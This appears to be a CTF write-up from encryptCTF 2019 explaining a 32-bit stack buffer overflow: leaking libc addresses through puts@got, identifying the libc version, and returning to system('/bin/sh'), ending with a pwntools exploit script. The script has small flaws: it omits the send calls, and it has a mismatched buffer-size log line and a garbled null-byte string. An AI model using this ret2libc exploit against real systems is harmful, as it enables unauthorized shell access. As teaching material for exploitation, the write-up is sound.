encryptCTF 2019 Pwn Write-up 4 of 5

4 minute read

First pwn board wipe of the year. hsb represent! 
First pwn board wipe of the year. hsb represent! 

Pwn3 Solution (300 pts.)

This challenge tackles stack buffer overflow — leaking a LIBC address that leads to a shell.

Challenge description:

libc is such a nice place to hangout, isn’t it?

Based on the description, it seems that the challenges revolves around libc. Common pwn challenges about libc requires leaking a libc address from the remote server to identify the libc version used by the program.

Let’s start by doing simple checks to the binary.

Commands used: `file` and `gdb` `checksec`

Again, the file is a 32-bit ELF executable, and Canary, PIE and RelRo are disabled. Hence, we can try to do a buffer overflow to overwrite the saved return address.

Let’s try to run the binary and enter a long unique string to determine if we can overwrite the saved return address.

Generate pattern using msf-pattern_create.rb

root@kali:pwn2# msf-pattern_create -l 300

Let’s use the string pattern as our input.

hehe segfault 

It seems we have overwritten the saved return address with 0x37654136. Let’s compute for the offset using msf-pattern_offset.rb.

root@kali:pwn3# msf-pattern_offset -q 0x37654136  
[*] Exact match at offset 140

We got the offset at 140. Our payload template should look like this:

payload = [140 bytes buffer] + [addr of next function]

Now, let’s inspect the binary with radare2 and look for useful functions.

pwn3 functions

It seems that there is no WIN function or system() function on this binary unlike the first three challenges.

Luckily, we have puts() function. We can use the puts function to leak a libc address from the remote server.

Reminder: Remote servers with ASLR enabled give a different LIBC address for each connection. Thus, we need to prevent program termination after the libc leak. We can loop back to the main function after leaking a libc address.

Let’s create a payload that will leak a libc address from the server, and loop back to main().

payload = [140 bytes buffer] + [puts()] + [main()] + [puts@got]

Quick note: puts.got contains the address of puts@LIBC function

Sample screenshot of getting puts@got address:

`0x80497b0` is the address of puts@got

The screenshot above shows that the puts@got address is 0x80497b0. We can see that 0x80497b0 contains an address which is 0xf7e2b210.

0xf7e2b210 is the address of puts() in the libc.

Going back to the payload, let’s replace the template with the following values:

gef➤  p main  
$1 = {<text variable, no debug info>} `0x804847d` <main>

puts@plt = `0x8048340`  
puts@got = `0x80497b0`

payload = [140 bytes buffer] + [`0x8048340`] + [`0x0804847d`] + [`0x80497b0`]

Let’s send this payload and wait for a leak 

Aha! A garbage data.

Success! We got a leak. Although it seems that it is just a garbage data, there is just no ascii character representation for the leaked bytes. Let’s convert the leaked data in a more readable form.

puts@libc leak 

We got a leak for puts@libc which is 0xf7e277e0. Using this leaked address, we can identify the version of libc by using https://libc.blukat.me/.

Quick note: The last 3 values of a libc address is always constant.

Oh, multiple libc versions :(

The database gave 3 different libc versions. Let’s leak another address, and query two addresses to get better results.

Let’s leak gets@libc using the same method. Just replace the puts@got from the previous payload with gets@got.

0x80497ac is the address of gets@got

payload = [140 bytes buffer] + [`0x8048340`] + [`0x0804847d`] + [`0x80497ac`]

gets@got leak 

Let’s go back to libc database search and use the 2 address that we leaked.

We got a decent libc version. Let’s use this libc to compute the libc base address, and the addresses of system() and /bin/sh.

Here is how we compute the addresses we need:

libc_base = puts_leak - puts_offset  
system_address = libc_base + system_offset  
bin_sh_address = libc_base + bin_sh_offset

We already got the values we need, let’s now craft our stage 2 payload.

Since the program loops back to main, let’s recompute the offset needed to overwrite the saved return address.

Generate pattern using msf-pattern_create.rb

root@kali:pwn2# msf-pattern_create -l 300


The program leads to a segmentation fault, let’s check the core dump generated by the program.

saved return address overwritten by 0x41346541

We can see that the saved return address is overwritten by 0x41346541. Let’s use msf-pattern_offset.rb to get the offset.

root@kali:pwn3# msf-pattern_offset -q 0x41346541  
[*] Exact match at offset 132

The offset is 132. We can now create our stage 2 payload with all the information.

payload = [132 bytes buffer] + [system()] + [4 bytes garbage] + [/bin/sh address]

We got a shell! 

Flag: encryptCTF{70_7h3_C3nt3R_0f_L!bC}

Sample exploit script:


from pwn import *

r = remote('', 4567)  
#r = process('./pwn3')  
libc = ELF('./libc.so.6')

offset = 140

puts_plt = 0x8048340  
puts_got = 0x80497b0

gets_plt = 0x8048330  
gets_got = 0x80497ac  
main_plt = 0x0804847d

# Stage 1 payload  
# ------------------------

payload = ""  
payload += "A"*offset  
payload += p32(puts_plt)  
payload += p32(main_plt)  
payload += p32(puts_got)


log.info('Payload format: [140 bytes buffer] + [puts() addr] + [main() addr] + [puts@got]')  

puts_leak = u32(r.recvline()[:4])  
log.info('Puts leak: {}'.format(hex(puts_leak)))

puts_offset = libc.symbols['puts']  
system_offset = libc.symbols['system']  
exit_offset = libc.symbols['exit']  
binsh_offset = next(libc.search('/bin/shx00'))

libc_base = puts_leak - puts_offset   
system_addr = libc_base + system_offset  
binsh_addr = libc_base + binsh_offset  
exit_addr = libc_base + exit_offset

log.info('Formula to compute the addresses we need:')  
log.info('libc_base = puts_leak - puts_offset')  
log.info('system_address = libc_base + system_offset')  
log.info('bin_sh_address = libc_base + bin_sh_offset')

log.info('libc base: {}'.format(hex(libc_base)))  
log.info('system() addr: {}'.format(hex(system_addr)))  
log.info('/bin/sh addr: {}'.format(hex(binsh_addr)))

# Stage 2 payload   
# -----------------------

payload = ""  
payload += "A"*132  
payload += p32(system_addr)  
payload += p32(exit_addr)  
payload += p32(binsh_addr)

log.info('Payload format: [44 bytes buffer] + [system() addr] + [4 bytes garbage] + [/bin/sh addr]')  
log.info('Sending stage 2 payload.')  
log.info('Enjoy your shell! ')

r.recvuntil('desert: ')  


— ar33zy

hackstreetboys aka [hsb] is a CTF team from the Philippines.

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